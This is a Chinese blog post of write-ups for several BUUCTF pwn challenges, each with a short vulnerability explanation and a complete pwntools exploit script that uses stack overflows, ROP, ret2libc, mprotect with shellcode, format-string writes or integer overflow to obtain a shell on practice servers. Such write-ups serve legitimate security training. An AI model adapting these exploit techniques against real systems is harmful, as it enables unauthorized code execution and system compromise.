BUU-pwn(三)

最新推荐文章于 2023-07-22 22:18:09 发布
最新推荐文章于 2023-07-22 22:18:09 发布
阅读量245 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/124697971
版权

not_the_same_3dsctf_2016

栈溢出,存在后门函数


后门函数:

将flag读取到fl4g参数中,需要将其输出。

from pwn import *
r=remote('node4.buuoj.cn',28249)
context.log_level='debug'

elf = ELF('not_the_same_3dsctf_2016')
write_addr = elf.sym['write']
get_secret = 0x080489A0
fl4g = 0x080ECA2D

payload = b'a'*0x2D+p32(get_secret)+p32(write_addr)+p32(fl4g)+p32(1)+p32(fl4g)+p32(50)
r.sendline(payload)
print(r.recv())
r.interactive()

解法二
利用 mprotect 函数可以修改内存权限,关于栈平衡 C|函数调用约定与堆栈平衡的汇编代码分析

#include <unistd.h>
#include <sys/mmap.h>
int mprotect(const void *start, size_t len, int prot);

mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值

prot可以取以下几个值,并且可以用“|”将几个属性合起来使用:

  • PROT_READ:表示内存段内的内容可写;

  • PROT_WRITE:表示内存段内的内容可读;

  • PROT_EXEC:表示内存段中的内容可执行;

  • PROT_NONE:表示内存段中的内容根本没法访问;


exp

from pwn import *
#r=process('./p')
r=remote('node4.buuoj.cn',25446)
context.log_level='debug'
elf = ELF('not_the_same_3dsctf_2016')

mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
pop_addr = 0x0806fcc8

args1 = 0x080EB000
args2 = 0x100
args3 = 0x7

shellcode = asm(shellcraft.sh())
payload = b'a'*0x2D+p32(mprotect_addr)+p32(pop_addr)+p32(args1)+p32(args2)+p32(args3)+p32(read_addr)+p32(pop_addr)+p32(0)+p32(args1)+p32(0x100)+p32(args1)
# padding+ mprotect + pop + 参数1+ 2+ 3+ ret(read_addr) + pop + 参数1 + 2 + 3 +ret(args1 执行shellcode) 
r.sendline(payload)
r.sendline(shellcode)

r.interactive()

ciscn_2019_n_5

存在栈溢出,ret2shellcode
在这里插入图片描述
保护全关


name在bss段,写shellcode到name,利用text溢出ret到shellcode,有个疑惑,本机ida,dbg调试都显示bss段为不可知性,问大佬说系统可能不一样,远程机器为可执行权限
exp

from pwn import *
#r=process('./p')
r=remote('node4.buuoj.cn',25622)
context(os='linux', arch='amd64', log_level='debug')

bss = 0x0601080

r.recvuntil("name")
shellcode = asm(shellcraft.sh())
r.sendline(shellcode)

r.recvuntil("me?")
payload = b'a'*(0x20+0x8)+p64(bss)
r.sendline(payload)

r.interactive()

others_shellcode

资料:CTF pwn傻傻分不清的execve、int80、syscall、system及shellcode

想要获得一个shell, 除了system(“/bin/sh”) 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用

32位:
int 0x80 汇编调用,系统调用号用 eax 储存, 第一 、 二 、 三参数分别在 ebx 、ecx 、edx中储存

64位:
syscall 汇编指令调用,系统调用号用 rax 储存, 第一 、 二 、 三参数分别在 rdi 、rsi 、rdx中储存


eax = 0FFFFFFFFh - 0FFFFFFF4h = 11。看上面函数也发现result也就是eax的值就是11,也就是调用了execve,还将/bin/sh存入了eax中,所以直接nc 即可

ciscn_2019_ne_5

ROPgadget找到sh地址,利用4中的strcpy溢出

from pwn import *
#r=process('./p')
r=remote('node4.buuoj.cn',26395)
context(os='linux', arch='amd64', log_level='debug')

system_addr = 0x080484d0
shell_addr=0x80482ea

r.sendlineafter('Please input admin password:','administrator')
r.recvuntil('Exit\n:')
r.sendline('1')
r.recvuntil("Please input new log info:")
payload = b'a'*0x48+b'a'*0x4+p32(system_addr)+b'a'*0x4+p32(shell_addr)
r.sendline(payload)
r.recvuntil('Exit\n:')
r.sendline('4')

r.interactive()

铁人三项(第五赛区)_2018_rop

属于ret2libc题型


exp

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

r = remote('node4.buuoj.cn',29991)
#r = process('./2018_rop')
elf = ELF('./2018_rop')

write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.sym['main']

payload=b'a'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.sendline(payload)

write_addr = u32(r.recv(4))
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
sys_addr = offset + libc.dump('system')
bin_addr = offset + libc.dump('str_bin_sh')
payload=b'a'*(0x88+4)+p32(sys_addr)+p32(0)+p32(bin_addr)
r.sendline(payload)
r.interactive()

bjdctf_2020_babyrop

64位程序,就需要考虑 64位的寄存器问题了

溢出点:

在这里插入图片描述
ROPgadget寻找pop rdi

ROPgadget --binary bjdctf_2020_babyrop |grep "pop rdi"

exp

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

r = remote('node4.buuoj.cn',29338)
#r = process('./2018_rop')
elf = ELF('./bjdctf_2020_babyrop')

pop_rdi = 0x400733
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']

print(hex(main_addr))
r.recvuntil("Pull up your sword and tell me u story!\n")
payload=b'a'*(0x20+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.sendline(payload)

puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)

offset = puts_addr - libc.dump('puts')
sys_addr = offset + libc.dump('system')
bin_addr = offset + libc.dump('str_bin_sh')
payload=b'a'*(0x20+8)+p64(pop_rdi)+p64(bin_addr)+p64(sys_addr)+p64(0)
r.recvuntil("Pull up your sword and tell me u story!\n")
r.sendline(payload)
r.interactive()

bjdctf_2020_babystack2

64位,有后门函数,这题考察一个有/无符号数,当输入0xffff,无符号型整数会认为是一个很大的数,但是对于有符号数就是 -1

exp

from pwn import *
#from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

r = remote('node4.buuoj.cn',26243)
#r = process('./2018_rop')
#elf = ELF('./bjdctf_2020_babyrop')

shell_addr = 0x0400726
r.recv()
r.sendline('-1')
payload = b'a'*(0x10+8)+p64(shell_addr)+p64(0)
r.recv()
r.sendline(payload)
r.interactive()

jarvisoj_fm

开启canary保护,存在格式化字符串漏洞,测算偏移为11


getshell条件为x == 4

exp,注意context为32位

from pwn import *
#from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')

r = remote('node4.buuoj.cn',28518)
#r = process('./2018_rop')
#elf = ELF('./bjdctf_2020_babyrop')

x_addr = 0x0804A02C
payload = fmtstr_payload(11,{x_addr:0x4})
r.sendline(payload)
r.interactive()

pwn2_sctf_2016

整数溢出+ret2libc

用户输入v2定义为有符号数
在这里插入图片描述
但是进入到 get_n 中,转为无符号数,-1小于32,绕过if

在这里插入图片描述

exp,这题有点坑,新版的libcsearcher搜出来的9个都不能用,用旧版的可以

from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')

r = remote('node4.buuoj.cn',27523)
#r = process('./2018_rop')
elf = ELF('./pwn2_sctf_2016')



printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
main=elf.sym['main']

r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')#输入-1的话会成为4294967295造成溢出
r.recvuntil('\n')
payload=b'a'*(0x2c+4)+p32(printf_plt)+p32(main)+p32(printf_got)
r.sendline(payload)
r.recvuntil('\n')
printf_addr=u32(r.recv(4))
libc=LibcSearcher('printf',printf_addr)

offset=printf_addr-libc.dump('printf')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
payload=b'a'*(0x2c+4)+p32(system)+p32(main)+p32(bin_sh)
r.sendline(payload)

r.interactive()

Ff.cheng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
攻防世界PWN之Recho题解
seaaseesa的博客
11-09 2324
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
course2610_lab19虚存映射mmap()及读写性能探究(上)
chumingqian的博客
05-19 1003
虚拟内存系统通过将虚拟内存分割为称作虚拟页(Virtual Page,VP)大小固定的块,一般情况下,每个虚拟页的大小默认是4096字节。 同样的,物理内存也被分割为物理页(Physical Page,PP),也为4096字节。 背景 在研发分布式日志存储系统,基于Raft协议的自研分布式日志存储系统,Logstore则是底层存储引擎。 Logstore中,使用mmap对数据文件进行读写。Logstore的存储结构简化如下图: Logstore使用了Segments Files + Index F.
BUUCTF靶场-web篇(一)
weixin_49349476的博客
03-24 401
BUUCTF靶场-web篇,EasySQL、include1、Havefun(WP)、Exec1
[BUUCTF]PWN——wdb2018_guess(stack smashing--canary报错利用)
mcmuyanga的博客
03-14 1152
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 619
buuctf pwn
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 367
buuctf pwn
BUUCTF靶场练习——第一周
weixin_47063945的博客
07-15 823
整理了buuctf靶场前6道web题目的writeup并整理了涉及到的部分知识的整理和扩展
BUUCTF在线靶场 部分WEB Writeup(updating)
叶子的Blog
10-12 641
Warmup [极客大挑战 2019]EasySQL 高明的黑客 [CISCN2019 华北赛区 Day2 Web1]Hack World
BUU系列
qq_49422880的博客
07-16 299
[GYCTF2020]FlaskApp    开始打开这个靶场,发现这是一个加解密的应用,我们可以进行base64加解密,开始寻找网页的源代码,使用脚本扫描目录文件也没有什么发现,查看应用的网页源代码也没有发现。之前所解的一道题是一个基于flask框架的SSRF,然后就疯狂在输入框里面输入命令,看看有什么命令是执行的,试了几次之后发现有这样一个过程。我试了试{{3+7}}这种简单的注入测试发现加密的结果是10的base64加密,那这样子肯定是存在一个命令执行漏洞的(存在SSTI漏洞),之后的注入当中发现在
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1851
[RoarCTF 2019]Easy Java
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1022
buuctf pwn
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 563
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识和扩展
BUU-pwn(一)
qq_53263789的博客
04-24 303
rip 简单栈溢出,后门函数 exp from pwn import * #io=process("./pwn") r = remote('node4.buuoj.cn',25253) payload=b'a'*0xf+b'a'*0x08+p64(0x0401187) r.sendline(payload) r.interactive() warmup_csaw_2016 后门函数 int sub_40060D() 泄露地址 exp from pwn import * #io=process("./pw
[每日一PWN]BUUCTF PWN5
qq_55233040的博客
11-28 346
遇到了buupwn题中按顺序的第一道格式化字符串漏洞的题目,难度稍有提升。
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值